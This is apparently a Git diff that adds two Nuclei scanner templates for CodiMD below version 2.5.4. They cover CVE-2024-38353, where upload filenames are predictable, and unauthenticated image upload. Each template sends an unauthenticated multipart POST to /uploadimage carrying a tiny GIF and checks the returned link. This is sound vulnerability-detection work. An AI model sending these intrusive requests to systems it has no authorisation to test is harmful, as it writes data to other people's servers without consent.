projectdiscovery · denandz · Dec 5, 2024 · Dec 5, 2024 · Dec 5, 2024
diff --git a/http/cves/2024/CVE-2024-38353.yaml b/http/cves/2024/CVE-2024-38353.yaml
@@ -0,0 +1,54 @@
+id: CVE-2024-38353
+
+info:
+  name: CodiMD <2.5.4 - Insecure Filename Randomization
+  author: denandz, PulseSecurity.co.nz
+  severity: medium
+  description: |
+    CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data. Due to the insecure random filename generation in the underlying Formidable library, an attacker can determine the filenames for previously uploaded images and the likelihood of this issue being exploited is increased.
+  impact: |
+    An attacker can gain unauthorised access to images uploaded to CodiMD.
+  remediation: |
+    Update CodiMD to version 2.5.4 or later
+  reference:
+    - https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
+    - https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2024-38353
+    cwe-id: CWE-338
+  metadata:
+    max-request: 1
+  tags: cve,cve2024,fileupload,unauth,intrusive
+
+http:
+  - raw:
+      - |
+        POST /uploadimage HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
+
+        -----------------------------92633278134516118923780781161
+        Content-Disposition: form-data; name="image"; filename="{{randstr}}.gif"
+        Content-Type: image/gif
+
+        {{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
+        -----------------------------92633278134516118923780781161--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - '"link":"/uploads/[a-z0-9]{25,25}.gif"'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"link":"(/uploads/[a-z0-9]{25,25}.gif)"'
diff --git a/http/vulnerabilities/codimd-file-upload.yaml b/http/vulnerabilities/codimd-file-upload.yaml
@@ -0,0 +1,45 @@
+id: codimd-unauth-file-upload
+
+info:
+  name: CodiMD - Unuathenticated File Upload
+  author: denandz, PulseSecurity.co.nz
+  severity: medium
+  description: |
+    CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.
+  reference:
+    - https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
+    - https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
+  metadata:
+    max-request: 1
+  tags: fileupload,unauth,intrusive
+
+http:
+  - raw:
+      - |
+        POST /uploadimage HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
+
+        -----------------------------92633278134516118923780781161
+        Content-Disposition: form-data; name="image"; filename="{{randstr}}.gif"
+        Content-Type: image/gif
+
+        {{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
+        -----------------------------92633278134516118923780781161--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - '"link":".*?.gif"'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"link":"(.*)"'